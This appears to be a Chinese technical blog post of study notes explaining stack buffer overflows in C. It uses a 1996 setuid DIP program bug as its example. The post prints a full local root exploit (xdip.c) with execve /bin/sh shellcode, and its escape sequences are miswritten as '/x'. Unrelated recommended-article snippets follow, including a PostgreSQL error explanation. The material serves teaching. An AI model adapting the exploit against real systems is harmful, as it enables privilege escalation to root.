What is "Buffer Overflows" and "format string vulnerabilities"

最新推荐文章于 2022-03-17 18:20:29 发布
原创 最新推荐文章于 2022-03-17 18:20:29 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#buffer #string #alignment #shell #null #语言

本文详细介绍了C语言中的缓冲区溢出漏洞原理及利用方法,并通过具体实例展示了如何利用此类漏洞获取系统root权限的过程。

 

伦敦大学孟博士极力推荐的内容.

 

网站是 http://doc.bughunter.net/

 

1. C 语言缓冲溢出漏洞
http://doc.bughunter.net/buffer-overflow/buffer-overflows.html

 

2. C++ 虚函数缓冲溢出漏洞

http://doc.bughunter.net/buffer-overflow/cpp-vptrs.html

 

3. 格式化字符串漏洞

http://doc.bughunter.net/format-string/exploit-fs.html

 

 

时间关系只粗粗看了其中的第一篇文章.

1. C 语言缓冲溢出漏洞

 

栈的地址一般是这样的。

|_parametre_I___| EBP+12
|_parametre II__| EBP+8
|_return adress_| EBP+4
|___saved_ESP___| EBP           ESP
|_local var I __| EBP-4
|_local var II__| EBP-8

函数调用开始的时候,CPU把函数调用后的返回地址Push进栈中,然后再跳转到被调用函数的入口程序存储器地址执行。
被调用函数结束后,函数局部变量依次被Pop出来,CPU调用返回指令(不同ARCH的CPU指令名并不相同)跳转到主程序地址。
这样一个函数调用就结束了。

如果被调用函数的局部缓冲溢出,正好覆盖了返回地址的值,则导致程序返回的时候无法返回到主程序。再进一步,如果这个返回地址
被黑客利用修改成某一段可执行的程序地址,则那段程序就会被执行了,如果那段程序被设置成新建一个Shell进程。
则黑客可以轻松利用当前用户登陆到系统,更进一步,如果当前进程正好是SUID限权,黑客新建的shell登陆就是root权限的! 很恐怖哦。

在3.3.7o-uri (8 Feb 96) 版本 DIP (Dial-Up IP Protocol) 程序中就有这样一个缓冲区溢出漏洞. 而这个程序在很多版本的Linux系统正好是默认setuid.

出问题的是DIP程序的这句代码.
l = stpcpy(l, argv[i]);

程序没有判断argv[i] 的长度,就将命令参数传递了进来,这给了黑客机会将凑好的数据塞给DIP程序使得栈中的返回地址被修改.

黑客只要写一个很简单的程序,就可以获得系统的root权限.

xdip.c :


#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 221
#define ALIGNMENT 1

char sc[]=
"/x31/xc0/x50/x68//sh/x68/bin/x89/xe3/x50/x53/x89/xe1/x99/xb0/x0b/xcd/x80";

void main()
{
char *env[3] = {sc, NULL};
char buf[BUFSIZE];
int i;
int *ap = (int *)(buf + ALIGNMENT);
int ret = 0xbffffffa - strlen(sc) - strlen("/usr/sbin/dip");

for (i = 0; i < BUFSIZE - 4; i += 4)
*ap++ = ret;

execle("/usr/sbin/dip", "dip", "-k", "-l", buf, NULL, env);
}


字符串
sc[]
是下面这段程序的机器指令,通过objdump 和 gdb 命令可以获得!
#include <unistd.h>

void main()
{
char *shell[2];

shell[0] = "/bin/sh";
shell[1] = NULL;

execve(shell[0], shell, NULL);
}

黑客通过计算和试验,利用程序缓冲区漏洞,修改进程调用main()结束后的程序返回地址,使其指向sc[],
而sc[]做的事情是新建了一个Shell进程.由于SUID的缘故,这样这个Shell进程还是root权限的! 












 



 

[CS-161]C语言内存漏洞以及如何利用
Cplus_ruler的博客
10-14 1677
[CS-161]C语言内存漏洞以及利用方式
[SEEDLab]格式化字符串攻击(format string vulnerability)
HananoYousei的博客
06-09 6103
[SEEDLab]格式化字符串漏洞(Format String Vulnerability) 实验PDF链接 Introduction 格式化字符串漏洞是一个经典的漏洞,也是Pwn里面一个基础吧。他是由于C语言中的printf相关的函数导致的。printf相比大家都已熟悉,对于下面这个语句: printf("%d%d%d", a, b, c); 系统会将"%d%d%d"和后面的a, b, c三个...
史上最详细的Buffer Overflow学习笔记
m0_57221101的博客
03-17 1873
如果您被标题吸引进来了,却发现我写的很烂,请不要生气; 如果您发现我写的有误,欢迎您于评论区中指教 文章中出现的对于BOF来说相关的专业名词,都可以在最后找到解释 如果这篇文章能在您学习的路上帮助到您,我感到非常荣幸 照片问题因为csdn不接受外链,照片不能直接传上来,所以这里采用截图的方式,但由于图中没什么重要信息,大家就当看个乐呵,如果真想看清楚的图,看文章末尾 环境配置 此处演示使用环境来自于TryHackMe | Buffer Overflow Prep 使用方法参考页面内教程 或者
缓冲区溢出(buffer overflow)避免方法
热门推荐
刘一凡的博客
07-24 3万+
什么是缓冲区溢出? copy数据进buffer时,数据长度超过buffer中的剩余空间。 缓冲区溢出的危害? 缓冲区溢出,结果随机,可能会导致程序功能不正常,也可能导致程序崩溃。如果受到影响的是其它功能,因为故障现象随机,所以问题通常很难定位。别有用心的攻击者还会利用缓冲区溢出缺陷,覆盖控制变量的内容,接管程序的运行。 详细来说: 读越界时,因为读取到错误的数据,所以可能导致功能不正常,...
格式化字符串溢出
每昔的博客
07-29 1万+
漏洞原理:        printf是c语言中少有的支持可变参数的库函数。对于可变参数的函数。函数的调用者可以自由的指定函数参数的数量和类型,被调用者无法知道在函数调用之前到底有多少参数被压入栈帧当中。        格式化字符串漏洞的产生根源主要源于对用户输入未进行过滤,这些输入数据都作为数据传递给某些执行格式化操作的函数,如printf,sprintf,vprintf,vprintf。恶...
Buffer Overflows and You
08-28
**Buffer Overflow 概述** Buffer overflow(缓冲区溢出)是一种常见的计算机安全漏洞,主要发生在C和C++等低级编程语言中。当程序尝试在内存分配的缓冲区内存储超过其实际大小的数据时,就会发生这种情况。这可能...
Buffer overflows 缓冲区溢出
02-18
 软件安全最大的威胁----缓冲区溢出  缓冲区:为大量的连续的同类型数据分配一段存储区域  缓冲区溢出:程序员写的数据超过了缓冲区的边界,将会覆盖邻近的区域
Buffer Overflows b.7z
08-20
. Introduction Nowadays there are many buffer overflow exploit codes....and so on. This paper will attempt to explain the advanced buffer overflow exploit skill under intel x86 linux.
Attacks_Buffer overflows
11-05
缓冲区溢出攻击是软件安全领域中最常见也是最危险的攻击方式之一。它涉及到向程序输入超长数据,导致程序的缓冲区溢出,从而破坏程序的正常运行并允许攻击者执行任意代码。缓冲区溢出分为几种类型,如堆溢出、栈溢出...
Skills Assessment - Stack Buffer Overflows on Linux x86-Write Up
08-06
Linux x86 Stack-Based Buffer Overflows - **概念**:栈溢出是一种常见的安全漏洞,攻击者通过向程序的缓冲区写入超出其长度的数据,使得堆栈上的数据遭到破坏或覆盖,从而控制程序流程。 - **原理**: - 在程序...
Format String 漏洞介绍 总结(二)
爱.NET
05-29 344
Format String 漏洞介绍 总结(二)bkbll(bkbll@cnhonker.net)2003/4/82. format stirng 漏洞利用通过前面讨论,我们很容易知道,如果要让我们的shellcode运行起来,必须要知道三个数据:1. 我们要写的地址,want_write_addr2. Printf参数后面多少位是我们自定义的数据地址,pad,也就是stack popup的值3....
String内存溢出异常(错误)可能的原因及解决方案
zhongwen7710的专栏
07-20 1万+
摘要:本Blog主要为了阐述java.lang.OutOfMemoryError:PermGenspace可能产生的原因及解决方案。其中PermGen space是Permanent Generationspace的简写,表示内存的永久保存区域,这块内存主要是被JVM存放Class和Meta信息的,Class在被Loader时就会被放到PermGenspace中,它和存放类实例(Instanc
缓存溢出Buffer Overflow
远有青山
01-29 1万+
缓存溢出(Buffer overflow),是指在存在缓存溢出安全漏洞的计算机中,攻击者可以用超出常规长度的字符数来填满一个域,通常是内存区地址。在某些情况下,这些过量的字符能够作为“可执行”代码来运行。从而使得攻击者可以不受安全措施的约束来控制被攻击的计算机。 缓存溢出(或译为缓冲溢出)为黑客最为常用的攻击手段之一,蠕虫病毒对操作系统高危漏洞的溢出高速与大规模传播均是利用此技术。
Format String 漏洞介绍 总结(四)
爱.NET
05-29 259
Format String 漏洞介绍 总结(四)Bkbll(bkbll@cnhonker.net)2003-3-95.覆盖GOT表在编译elf文件的时候,如果要用到其他动态库的函数,比如printf, exit等, 编译的时候并不会直接把这两个函数的代码编译进去,而是留一个调用地址在GOT表里面,当elf文件被加载的时候,代码段才会真正加载进来,然后替换掉GOT表里面的地址(具体实现可以参考ale...
Fortify自定义规则笔记(二)
liweibin812的博客
02-15 6444
对于自定义规则,我们需要掌握每条规则的所代表的可以检查的漏洞类型,这样,才能编写有效的自定义规则,伴随着自定义规则库的增多,Fortify SCA发现漏洞,和降低误报率会越来越低,一定程度上可以智能化的扫描系统。
(原创)攻击方式学习之(3) - 缓冲区溢出(Buffer Overflow)
weixin_34212189的博客
09-06 1414
堆栈溢出 堆栈溢出通常是所有的缓冲区溢出中最容易进行利用的。了解堆栈溢出之前,先了解以下几个概念: 缓冲区 简单说来是一块连续的计算机内存区域,可以保存相同数据类型的多个实例。 堆栈 堆 栈是一个在计算机科学中经常使用的抽象数据类型。堆栈中的物体具有一个特性:最后一个放入堆栈中的物体总...
关于 C++ 左操作数和右操作数
stevenliyong 的专栏
01-05 6865
 1.a * b与函数调用operator*(a,b)是等价的。 2.const Rational operator*(const Rational& lhs, const Rational& rhs);你可以看到,left-hand operand(左手操作数)a 在函数内部以 lhs 的面目出现,而 right-hand operand(右手操作数)b 以
C++ 隐式和显式 初始化,类型转换
stevenliyong 的专栏
01-05 4273
 1. 隐式和显式初始化1.1 C++隐式初始化int ival(1024);string hello("Hello world.")1.2 C++显式初始化int ival = 1024;string hello = "Hello world."  *PS: 注意这里"=" 语法是拷贝构造函数而不是赋值运算! 因为一个新对象被定义一定要有一个构造函数而不不是一个赋值操作 
我执行SELECT * FROM table_1 WHERE amt ! = 0报错 value overflows numeric format是为什么
最新发布
02-26
<think>好的,用户现在遇到了一个错误:“value overflows numeric format”,但之前讨论的是语法错误。我需要先理清楚用户的问题。 用户之前的提问是关于在PostgreSQL中使用“!=”和“! =”的区别,当时第二个查询因为空格问题导致语法错误。现在用户执行了类似的查询,但错误信息不同,变成了数值溢出。这说明用户可能已经修正了语法问题,但出现了新的错误。 首先,我需要确认用户当前的SQL语句是否有语法错误。如果用户仍然在“!”和“=”之间有空格,那么应该先报语法错误,但用户现在得到的是数值溢出错误,这可能意味着用户已经去掉了空格,正确使用了“!=”,但查询中的amt字段可能包含超出数值类型范围的值。 接下来,我需要考虑数值溢出的可能原因。amt字段可能是NUMERIC或DECIMAL类型,并且用户可能在查询中有计算或转换操作,或者数据本身有问题。例如,用户可能在amt字段中有非常大的数值,或者在WHERE子句中进行了某种运算导致溢出。 另外,用户可能误解了错误信息,误以为错误是来自条件语句的写法,但实际上问题出在amt字段的值上。比如,amt字段存储的值超过了定义的精度或范围,或者在查询过程中进行了某种计算导致临时结果超出了范围。 需要检查用户的具体表结构,尤其是amt字段的数据类型。例如,如果定义为NUMERIC(5,2),那么数值超过999.99就会溢出。用户可能在插入数据时没有正确限制数值大小,或者查询中的操作(如乘法)导致结果过大。 另外,用户可能在查询中使用了类型转换,例如将字符串转换为NUMERIC时,字符串内容过大,导致转换失败。或者,在WHERE子句中进行了数学运算,如amt * 1000,导致结果溢出。 还要考虑用户是否在WHERE子句中有其他隐藏的操作,比如函数调用,这些可能引起溢出错误。例如,使用了一些自定义函数处理amt字段,导致中间结果超出范围。 总结可能的解决步骤:建议用户检查amt字段的数据类型,确认是否有数值超出定义的范围,检查查询中是否有运算或转换操作,并建议使用EXPLAIN分析查询计划,查看是否有隐式类型转换或计算步骤导致溢出。</think>你在执行 `SELECT * FROM table_1 WHERE amt ! = 0` 时遇到的 `value overflows numeric format` 错误,**根本原因不是语法问题,而是字段 `amt` 的数据类型或数据值超出了 PostgreSQL 数值类型的范围**。以下是详细分析: --- ### 1. **错误的核心原因** - **字段 `amt` 的数据类型**:如果 `amt` 是 `NUMERIC` 或 `DECIMAL` 类型,且你为该字段定义了固定精度(例如 `NUMERIC(10,2)`),则存入或计算出的数值可能超出定义的范围。 - **数值溢出**:当某个值超过了字段允许的精度(例如 `NUMERIC(5,2)` 最大值为 `999.99`),PostgreSQL 会抛出 `value overflows numeric format` 错误。 - **隐式操作触发溢出**:即使你的查询中没有直接写入计算,某些隐式操作(例如类型转换、函数调用)也可能触发溢出。 --- ### 2. **为什么错误出现在 `WHERE amt ! = 0` 中?** 虽然 `amt ! = 0` 的语法是错误的(`!=` 写成 `! =` 会导致语法错误),但根据你的描述,实际遇到的错误是 `value overflows numeric format`。这意味着: - **你可能已修复了语法问题**(例如改为 `amt != 0` 或 `amt <> 0`),但数据本身的数值触发了溢出。 - **可能的场景**: 1. **数据本身不合法**:`amt` 字段中存在超过其精度定义的值(例如定义为 `NUMERIC(5,2)`,但实际存入了 `1000.00`)。 2. **查询中的隐式计算**:即使直接查询 `amt` 字段,某些隐式类型转换或索引扫描逻辑可能触发了数值校验。 --- ### 3. **验证和解决方法** #### (1) **检查字段定义** 查看 `amt` 字段的数据类型和精度: ```sql \d table_1 ``` 如果输出类似 `NUMERIC(10,2)`,则任何超过 `99999999.99` 的数值都会溢出。 #### (2) **查找非法数据** 执行以下查询,检查是否有超出精度的值: ```sql -- 假设 amt 是 NUMERIC(10,2) SELECT * FROM table_1 WHERE amt >= 100000000.00; -- 根据实际精度调整阈值 ``` #### (3) **修复数据或调整字段精度** - **方案 1**:扩大字段精度: ```sql ALTER TABLE table_1 ALTER COLUMN amt TYPE NUMERIC(15,2); ``` - **方案 2**:清理非法数据: ```sql DELETE FROM table_1 WHERE amt >= 100000000.00; ``` #### (4) **检查查询中的隐式操作** 如果查询包含函数或计算(例如 `amt * 1000`),可能需要显式限制结果范围: ```sql SELECT * FROM table_1 WHERE (amt * 1000) <= 999999999.99; -- 手动限制范围 ``` --- ### 4. **关联问题:语法
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值